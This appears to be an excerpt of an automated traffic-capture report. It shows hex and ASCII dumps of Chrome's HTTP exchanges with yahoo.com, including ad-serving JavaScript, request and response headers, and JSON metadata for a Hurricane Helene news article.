                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 1331,Infinity":[16,3],"481,1330":[40,9]},size:[3,1]},Lighthouse:{breakpoints:{"0,Infinity":[9,16]},size:[2,2]},SmartAssetWidgetLarge:{size:[800,635]},Spotlight:{breakpoints:{"0,480":[8,9]},size:[3,2]},TradeNow:{size:[280,55]}},k={"[1440,1024]":"Login","[2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 7d 2c 51 3d 7b 63 6c 69 63 6b 3a 22 63 6c 69 63 6b 22 2c 6e 6f 63 6f 6e 74 65 6e 74 3a 22 6e 6f 63 6f 6e 74 65 6e 74 22 2c 72 65 6e 64 65 72 3a 22 72 65 6e 64 65 72 22 7d 2c 4a 3d 22 61 75 63 74 69 6f 6e 49 6e 69 74 22 2c 4b 3d 22 62 69 64 57 6f 6e 22 2c 58 3d 7b 65 30 3a 22 2d 65 30 22 2c 65 31 3a 22 2d 65 31 22 2c 45 49 44 53 5f 55 52 4c 3a 22 69 64 78 2e 6c 69 61 64 6d 2e 63 6f 6d 22 2c 48 42 5f 55 49 5f 4d 4f 44 3a 22 68 62 5f 75 69 64 5f 6d 6f 64 22 2c 4c 49 5f 4f 46 46 3a 22 6c 69 76 65 49 6e 74 65 6e 74 49 64 5f 6f 66 66 22 2c 4c 49 5f 4f 4e 5f 45 4e 52 49 43 48 45 44 3a 22 6c 69 76 65 69 6e 74 65 6e 74 69 64 5f 6f 6e 5f 65 6e 72 69 63 68 65 64 22 2c 4c 49 5f 4f 4e 5f 4e 4f 54 5f 45 4e 52 49 43 48 45 44 3a 22 6c 69 76 65 69 6e 74 65 6e 74 69 64 5f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: },Q={click:"click",nocontent:"nocontent",render:"render"},J="auctionInit",K="bidWon",X={e0:"-e0",e1:"-e1",EIDS_URL:"idx.liadm.com",HB_UI_MOD:"hb_uid_mod",LI_OFF:"liveIntentId_off",LI_ON_ENRICHED:"liveintentid_on_enriched",LI_ON_NOT_ENRICHED:"liveintentid_
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 3d 22 6d 6f 76 69 65 73 22 2c 65 2e 6d 75 73 69 63 3d 22 6d 75 73 69 63 22 2c 65 2e 6e 65 77 73 3d 22 6e 65 77 73 22 2c 65 2e 72 69 76 61 6c 73 3d 22 72 69 76 61 6c 73 22 2c 65 2e 73 70 6f 72 74 73 3d 22 73 70 6f 72 74 73 22 2c 65 2e 73 74 79 6c 65 3d 22 73 74 79 6c 65 22 2c 65 2e 74 65 63 68 3d 22 74 65 63 68 22 2c 65 2e 74 65 63 68 63 72 75 6e 63 68 3d 22 74 65 63 68 63 72 75 6e 63 68 22 7d 28 72 65 7c 7c 28 72 65 3d 7b 7d 29 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 79 61 68 6f 6f 5f 6d 61 69 6c 3d 22 79 61 68 6f 6f 5f 6d 61 69 6c 22 2c 65 2e 61 6f 6c 5f 77 65 62 6d 61 69 6c 3d 22 61 6f 6c 5f 77 65 62 6d 61 69 6c 22 2c 65 2e 79 61 68 6f 6f 5f 72 6f 67 65 72 73 5f 6d 61 69 6c 3d 22 79 61 68 6f 6f 5f 72 6f 67 65 72 73 5f 6d 61 69 6c 22 2c 65 2e 79
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ="movies",e.music="music",e.news="news",e.rivals="rivals",e.sports="sports",e.style="style",e.tech="tech",e.techcrunch="techcrunch"}(re||(re={})),function(e){e.yahoo_mail="yahoo_mail",e.aol_webmail="aol_webmail",e.yahoo_rogers_mail="yahoo_rogers_mail",e.y
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 33 77 65 77 67 22 2c 5b 61 65 2e 79 61 68 6f 6f 5f 61 74 74 5f 6d 61 69 6c 5d 3a 22 64 34 39 70 68 38 6a 7a 33 77 65 77 67 22 2c 5b 61 65 2e 79 61 68 6f 6f 5f 66 72 6f 6e 74 69 65 72 5f 6d 61 69 6c 5d 3a 22 64 34 39 70 68 38 6a 7a 33 77 65 77 67 22 2c 5b 61 65 2e 79 61 68 6f 6f 5f 76 65 72 69 7a 6f 6e 5f 6d 61 69 6c 5d 3a 22 64 34 39 70 68 38 6a 7a 33 77 65 77 67 22 2c 5b 61 65 2e 61 6f 6c 5f 77 65 62 6d 61 69 6c 5d 3a 22 64 32 75 65 76 33 69 33 36 35 7a 35 71 38 22 2c 5b 61 65 2e 79 61 68 6f 6f 5f 6c 6f 67 69 6e 5d 3a 22 64 31 74 71 72 73 37 76 7a 39 34 64 39 6b 22 2c 5b 61 65 2e 61 6f 6c 5f 6c 6f 67 69 6e 5d 3a 22 64 33 61 78 68 35 65 6d 67 35 65 63 65 30 22 2c 64 65 66 61 75 6c 74 3a 22 64 39 70 6d 73 67 36 6d 76 78 7a 7a 36 22 2c 73 61 6e 64 62 6f 78
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 3wewg",[ae.yahoo_att_mail]:"d49ph8jz3wewg",[ae.yahoo_frontier_mail]:"d49ph8jz3wewg",[ae.yahoo_verizon_mail]:"d49ph8jz3wewg",[ae.aol_webmail]:"d2uev3i365z5q8",[ae.yahoo_login]:"d1tqrs7vz94d9k",[ae.aol_login]:"d3axh5emg5ece0",default:"d9pmsg6mvxzz6",sandbox
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 2c 31 31 39 37 38 31 32 30 38 33 2c 39 36 33 39 39 38 38 35 34 2c 31 31 38 33 38 33 36 31 39 33 2c 31 31 39 37 38 31 32 31 35 30 2c 31 31 39 37 38 31 32 31 34 36 2c 31 31 39 37 38 31 32 31 32 38 2c 31 31 39 37 38 31 32 31 32 35 2c 31 31 39 37 38 31 32 31 32 36 2c 31 31 39 37 38 31 32 31 32 37 2c 31 31 39 37 38 31 32 31 33 33 2c 31 31 39 37 38 31 32 31 33 32 2c 31 31 39 37 38 31 32 31 33 34 2c 31 31 39 37 38 31 32 31 32 39 2c 31 31 39 37 38 31 32 31 33 30 2c 31 31 39 37 38 31 32 31 33 31 2c 31 31 38 37 33 33 36 32 30 31 2c 39 36 34 32 39 38 38 35 34 2c 31 31 38 37 33 33 36 32 30 32 2c 31 31 39 37 38 31 32 31 35 33 2c 31 31 39 37 38 31 32 31 35 34 2c 31 31 39 37 38 31 32 31 35 35 2c 31 31 39 37 38 31 32 31 35 36 2c 31 31 39 37 38 31 32 31 35 37 2c 31 31 39
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ,1197812083,963998854,1183836193,1197812150,1197812146,1197812128,1197812125,1197812126,1197812127,1197812133,1197812132,1197812134,1197812129,1197812130,1197812131,1187336201,964298854,1187336202,1197812153,1197812154,1197812155,1197812156,1197812157,119
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 3a 22 79 66 69 6e 22 2c 5b 72 65 2e 66 70 5d 3a 22 79 68 70 22 2c 5b 72 65 2e 67 6d 61 5d 3a 22 79 6e 65 77 73 22 2c 5b 72 65 2e 6c 69 66 65 73 74 79 6c 65 5d 3a 22 79 6c 69 66 65 22 2c 5b 72 65 2e 6d 6f 6e 65 79 5d 3a 22 79 66 69 6e 22 2c 5b 72 65 2e 6d 6f 76 69 65 73 5d 3a 22 79 6d 6f 76 22 2c 5b 72 65 2e 6d 75 73 69 63 5d 3a 22 79 65 6e 74 22 2c 5b 72 65 2e 6e 65 77 73 5d 3a 22 79 6e 65 77 73 22 2c 5b 72 65 2e 73 70 6f 72 74 73 5d 3a 22 79 73 70 6f 72 74 73 22 2c 5b 72 65 2e 73 74 79 6c 65 5d 3a 22 79 6c 69 66 65 22 2c 5b 72 65 2e 74 65 63 68 5d 3a 22 79 74 65 63 68 22 7d 2c 52 65 3d 5b 22 63 6f 6d 6d 65 72 63 65 41 72 74 69 63 6c 65 54 79 70 65 22 2c 22 65 78 74 72 61 63 74 65 64 4b 65 79 57 6f 72 64 73 22 2c 22 61 62 6b 22 2c 22 68 61 73 68 74 61 67
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: :"yfin",[re.fp]:"yhp",[re.gma]:"ynews",[re.lifestyle]:"ylife",[re.money]:"yfin",[re.movies]:"ymov",[re.music]:"yent",[re.news]:"ynews",[re.sports]:"ysports",[re.style]:"ylife",[re.tech]:"ytech"},Re=["commerceArticleType","extractedKeyWords","abk","hashtag
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 2c 22 4d 4f 4e 22 5d 7d 2c 57 65 3d 5b 22 61 79 5f 66 6c 6f 6f 72 22 2c 22 61 79 5f 66 6c 6f 6f 72 5f 6d 22 2c 22 61 79 5f 66 6c 6f 6f 72 5f 67 22 2c 22 61 79 5f 68 61 73 68 22 2c 22 68 62 5f 61 64 6f 6d 61 69 6e 22 2c 22 68 62 5f 61 64 69 64 22 2c 22 68 62 5f 62 69 64 64 65 72 22 2c 22 68 62 5f 62 69 64 64 65 72 5f 73 65 61 74 69 64 22 2c 22 68 62 5f 63 61 63 68 65 5f 68 6f 73 74 22 2c 22 68 62 5f 63 61 63 68 65 5f 69 64 22 2c 22 68 62 5f 63 61 63 68 65 5f 70 61 74 68 22 2c 22 68 62 5f 63 61 63 68 65 5f 72 65 67 69 6f 6e 22 2c 22 68 62 5f 63 72 69 64 22 2c 22 68 62 5f 64 65 61 6c 22 2c 22 68 62 5f 64 73 70 22 2c 22 68 62 5f 64 74 22 2c 22 68 62 5f 66 6f 72 6d 61 74 22 2c 22 68 62 5f 70 62 22 2c 22 68 62 5f 70 62 31 30 30 22 2c 22 68 62 5f 73 69 7a 65 22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ,"MON"]},We=["ay_floor","ay_floor_m","ay_floor_g","ay_hash","hb_adomain","hb_adid","hb_bidder","hb_bidder_seatid","hb_cache_host","hb_cache_id","hb_cache_path","hb_cache_region","hb_crid","hb_deal","hb_dsp","hb_dt","hb_format","hb_pb","hb_pb100","hb_size"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 72 28 69 3d 65 2e 74 6f 70 2c 73 3d 65 2e 62 6f 74 74 6f 6d 3b 69 3c 3d 73 3b 29 61 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 69 2b 73 29 2f 32 29 2c 6f 3d 64 6f 63 75 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 46 72 6f 6d 50 6f 69 6e 74 28 65 2e 6c 65 66 74 2c 61 29 2c 6f 3d 3d 3d 74 3f 73 3d 61 2d 31 3a 69 3d 61 2b 31 3b 65 6c 73 65 20 69 66 28 22 64 6f 77 6e 22 3d 3d 3d 6e 29 66 6f 72 28 69 3d 65 2e 74 6f 70 2c 73 3d 65 2e 62 6f 74 74 6f 6d 3b 69 3c 3d 73 3b 29 61 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 69 2b 73 29 2f 32 29 2c 6f 3d 64 6f 63 75 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 46 72 6f 6d 50 6f 69 6e 74 28 65 2e 6c 65 66 74 2c 61 29 2c 6f 3d 3d 3d 74 3f 69 3d 61 2b 31 3a 73 3d 61 2d 31 3b 65 6c 73 65 20 69 66 28 22 6c 65 66 74 22 3d 3d 3d 6e 29 66 6f 72 28 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: r(i=e.top,s=e.bottom;i<=s;)a=Math.floor((i+s)/2),o=document.elementFromPoint(e.left,a),o===t?s=a-1:i=a+1;else if("down"===n)for(i=e.top,s=e.bottom;i<=s;)a=Math.floor((i+s)/2),o=document.elementFromPoint(e.left,a),o===t?i=a+1:s=a-1;else if("left"===n)for(i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 70 3a 69 2c 62 6f 74 74 6f 6d 3a 73 2c 6c 65 66 74 3a 6f 2c 72 69 67 68 74 3a 72 7d 3d 65 3b 74 72 79 7b 63 6f 6e 73 74 20 65 3d 73 74 28 7b 62 6f 74 74 6f 6d 3a 73 2c 6c 65 66 74 3a 6f 2c 72 69 67 68 74 3a 72 2c 74 6f 70 3a 69 7d 2c 74 2c 22 75 70 22 29 2c 61 3d 73 74 28 7b 62 6f 74 74 6f 6d 3a 73 2c 6c 65 66 74 3a 6f 2c 72 69 67 68 74 3a 72 2c 74 6f 70 3a 65 7d 2c 74 2c 22 64 6f 77 6e 22 29 2c 63 3d 73 74 28 7b 62 6f 74 74 6f 6d 3a 61 2c 6c 65 66 74 3a 6f 2c 72 69 67 68 74 3a 72 2c 74 6f 70 3a 65 7d 2c 74 2c 22 6c 65 66 74 22 29 3b 72 65 74 75 72 6e 28 61 2d 65 29 2a 28 73 74 28 7b 62 6f 74 74 6f 6d 3a 61 2c 6c 65 66 74 3a 63 2c 72 69 67 68 74 3a 72 2c 74 6f 70 3a 65 7d 2c 74 2c 22 72 69 67 68 74 22 29 2d 63 29 2f 6e 7d 63 61 74 63 68 28 65 29 7b 72 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: p:i,bottom:s,left:o,right:r}=e;try{const e=st({bottom:s,left:o,right:r,top:i},t,"up"),a=st({bottom:s,left:o,right:r,top:e},t,"down"),c=st({bottom:a,left:o,right:r,top:e},t,"left");return(a-e)*(st({bottom:a,left:c,right:r,top:e},t,"right")-c)/n}catch(e){re


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    101192.168.2.44986487.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1862OUTGET /caas/content/article/?uuid=2b2a262c-878f-3f65-9ba6-39ad37b780eb,b919e796-b03c-39fc-87e7-500abd2430fc,dce5eeb8-da4f-3016-b6b1-671a1b05f180,cc162679-b996-3b22-bf08-a33e637cd3e7,e83ce260-cc8d-4911-9251-00d71cd9beb8,877f8ab1-324b-3028-8015-3030372e4744,12f9c9af-c6c2-3c17-b79d-5f82604d80b2,9df6c4a7-8f43-3b8c-bc27-cbec371808d8,d6bedef8-7f7f-361b-a1ed-95df489e3d8b,17667347-cb18-3690-87e0-525837a669bf&appid=news_web&device=desktop&lang=en-US&region=US&site=fp&partner=none&bucket=900,seamless&features=enableEVPlayer,enableOverrideSpaceId,contentFeedbackEnabled,enableAdFeedbackV2,enableInArticleAd,enableOpinionLabel,enableSingleSlotting,enableVideoDocking,outStream,showCommentsIconWithDynamicCount,enableStickyAds,showCommentsIconInShareSec,enableAdSlotsNewMap,enableGAMAds,enableGAMAdsOnLoad,enableFinancePremiumTicker,enableAdLiteUpSellFeedback,enableRRAtTop,enableCommentsCountInViewCommentsCta,enableRRAdsSlots,enableRRAdsSlotsWithJAC,newsModal,enableViewCommentsCTA&rid=1pa4ckpjflnfm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-webp: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC609INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-powered-by: Express
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    access-control-allow-credentials: true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    access-control-allow-methods: GET, OPTIONS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    content-length: 410599
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    etag: W/"643e7-E7yUixg9wellgVPOtJTah3wNTMI"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    date: Mon, 30 Sep 2024 17:21:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-envoy-upstream-service-time: 84
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC762INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC901INData Raw: 7b 22 69 74 65 6d 73 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 22 70 61 72 74 6e 65 72 44 61 74 61 22 3a 7b 22 61 64 4d 65 74 61 22 3a 7b 22 68 61 73 68 74 61 67 22 3a 22 6e 65 77 73 3b 64 69 73 61 73 74 65 72 73 3b 77 65 61 74 68 65 72 3b 6e 61 74 75 72 61 6c 70 68 65 6e 6f 6d 65 6e 61 3b 63 75 6c 74 75 72 65 3b 6e 61 74 75 72 65 61 6e 64 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 2c 22 69 73 53 75 70 70 6c 79 53 65 67 6d 65 6e 74 22 3a 22 66 61 6c 73 65 22 2c 22 6c 61 6e 67 22 3a 22 65 6e 2d 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 55 53 22 2c 22 72 73 22 3a 22 6c 6d 73 69 64 3a 61 30 61 36 54 30 30 30 30 30 52 32 4b 58 47 51 41 33 3b 72 65 76 73 70 3a 63 6e 6e 5f 61 72 74 69 63 6c 65 73 5f 38 37 35 3b 6c 70 73 74 61 69 64 3a 32 62 32 61 32 36 32 63 2d 38 37 38 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: {"items":[{"data":{"partnerData":{"adMeta":{"hashtag":"news;disasters;weather;naturalphenomena;culture;natureandenvironment","isSupplySegment":"false","lang":"en-US","region":"US","rs":"lmsid:a0a6T00000R2KXGQA3;revsp:cnn_articles_875;lpstaid:2b2a262c-878f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 3b 70 64 3a 6d 6f 64 61 6c 3b 76 65 72 3a 6d 65 67 61 73 74 72 6d 3b 6c 75 3a 30 3b 70 63 74 3a 73 74 6f 72 79 5c 22 22 2c 22 73 70 61 63 65 69 64 22 3a 22 31 31 39 37 37 39 32 34 34 36 22 2c 22 73 69 74 65 22 3a 22 6e 65 77 73 22 2c 22 65 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 70 6f 73 22 3a 22 22 2c 22 73 68 6f 77 42 6f 64 79 41 64 73 22 3a 66 61 6c 73 65 2c 22 73 68 6f 77 50 68 6f 74 6f 41 64 73 22 3a 66 61 6c 73 65 7d 2c 22 61 6c 69 61 73 22 3a 22 79 6d 65 64 69 61 2d 61 6c 69 61 73 3a 73 68 61 64 6f 77 3d 6f 6e 65 2d 73 74 6f 72 6d 2d 39 35 2d 64 65 61 64 2d 35 30 30 2d 30 37 30 37 34 33 36 35 38 22 2c 22 63 61 6e 6f 6e 69 63 61 6c 53 69 74 65 22 3a 22 6e 65 77 73 22 2c 22 63 61 6e 6f 6e 69 63 61 6c 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ;pd:modal;ver:megastrm;lu:0;pct:story\"","spaceid":"1197792446","site":"news","enabled":true,"pos":"","showBodyAds":false,"showPhotoAds":false},"alias":"ymedia-alias:shadow=one-storm-95-dead-500-070743658","canonicalSite":"news","canonicalUrl":"https://ww
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 2c 22 65 6e 64 63 68 61 72 22 3a 32 36 35 33 2c 22 73 70 65 63 69 61 6c 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 22 68 33 22 5d 2c 22 69 6e 73 74 61 6e 63 65 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 5d 7d 2c 7b 22 74 65 72 6d 22 3a 22 57 49 4b 49 49 44 3a 57 68 69 74 65 5f 48 6f 75 73 65 22 2c 22 6c 61 62 65 6c 22 3a 22 57 68 69 74 65 20 48 6f 75 73 65 22 2c 22 63 61 70 41 62 74 53 63 6f 72 65 22 3a 22 30 2e 38 39 34 22 2c 22 6d 65 74 61 44 61 74 61 22 3a 5b 7b 22 76 69 73 69 62 6c 65 22 3a 22 66 61 6c 73 65 22 7d 5d 2c 22 73 74 61 72 74 63 68 61 72 22 3a 32 37 38 34 2c 22 65 6e 64 63 68 61 72 22 3a 32 37 39 34 2c 22 73 70 65 63 69 61 6c 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 5d 2c 22 69 6e 73 74 61 6e 63 65 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 5d 7d 2c 7b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ,"endchar":2653,"specialParentTags":["h3"],"instanceParentTags":[]},{"term":"WIKIID:White_House","label":"White House","capAbtScore":"0.894","metaData":[{"visible":"false"}],"startchar":2784,"endchar":2794,"specialParentTags":[],"instanceParentTags":[]},{
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 22 63 61 70 41 62 74 53 63 6f 72 65 22 3a 22 30 2e 37 38 32 22 2c 22 6d 65 74 61 44 61 74 61 22 3a 5b 7b 22 76 69 73 69 62 6c 65 22 3a 22 66 61 6c 73 65 22 7d 5d 2c 22 73 74 61 72 74 63 68 61 72 22 3a 31 34 39 38 2c 22 65 6e 64 63 68 61 72 22 3a 31 35 31 33 2c 22 73 70 65 63 69 61 6c 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 5d 2c 22 69 6e 73 74 61 6e 63 65 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 5d 7d 2c 7b 22 74 65 72 6d 22 3a 22 57 49 4b 49 49 44 3a 4d 6f 62 69 6c 65 5f 70 68 6f 6e 65 5f 73 69 67 6e 61 6c 22 2c 22 6c 61 62 65 6c 22 3a 22 63 65 6c 6c 20 70 68 6f 6e 65 20 72 65 63 65 70 74 69 6f 6e 22 2c 22 63 61 70 41 62 74 53 63 6f 72 65 22 3a 22 30 2e 37 33 35 22 2c 22 6d 65 74 61 44 61 74 61 22 3a 5b 7b 22 76 69 73 69 62 6c 65 22 3a 22 66 61 6c 73 65 22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: "capAbtScore":"0.782","metaData":[{"visible":"false"}],"startchar":1498,"endchar":1513,"specialParentTags":[],"instanceParentTags":[]},{"term":"WIKIID:Mobile_phone_signal","label":"cell phone reception","capAbtScore":"0.735","metaData":[{"visible":"false"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 4f 72 69 67 69 6e 61 6c 43 6f 6e 74 65 6e 74 22 3a 66 61 6c 73 65 2c 22 69 73 50 65 72 73 6f 6e 61 6c 46 69 6e 61 6e 63 65 41 72 74 69 63 6c 65 22 3a 66 61 6c 73 65 2c 22 69 73 45 64 69 74 6f 72 69 61 6c 50 69 63 6b 73 4c 69 73 74 4f 76 65 72 72 69 64 64 65 6e 22 3a 66 61 6c 73 65 2c 22 69 73 53 70 6f 6e 73 6f 72 65 64 43 6f 6e 74 65 6e 74 22 3a 66 61 6c 73 65 2c 22 6b 65 79 77 6f 72 64 73 22 3a 22 4e 6f 72 74 68 20 43 61 72 6f 6c 69 6e 61 2c 20 53 6f 75 74 68 20 43 61 72 6f 6c 69 6e 61 2c 20 50 72 65 73 69 64 65 6e 74 20 4a 6f 65 20 42 69 64 65 6e 2c 20 57 68 69 74 65 20 48 6f 75 73 65 2c 20 48 75 72 72 69 63 61 6e 65 20 48 65 6c 65 6e 65 2c 20 41 73 68 65 76 69 6c 6c 65 2c 20 46 6c 6f 72 69 64 61 2c 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 20 69 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: OriginalContent":false,"isPersonalFinanceArticle":false,"isEditorialPicksListOverridden":false,"isSponsoredContent":false,"keywords":"North Carolina, South Carolina, President Joe Biden, White House, Hurricane Helene, Asheville, Florida, Communications in
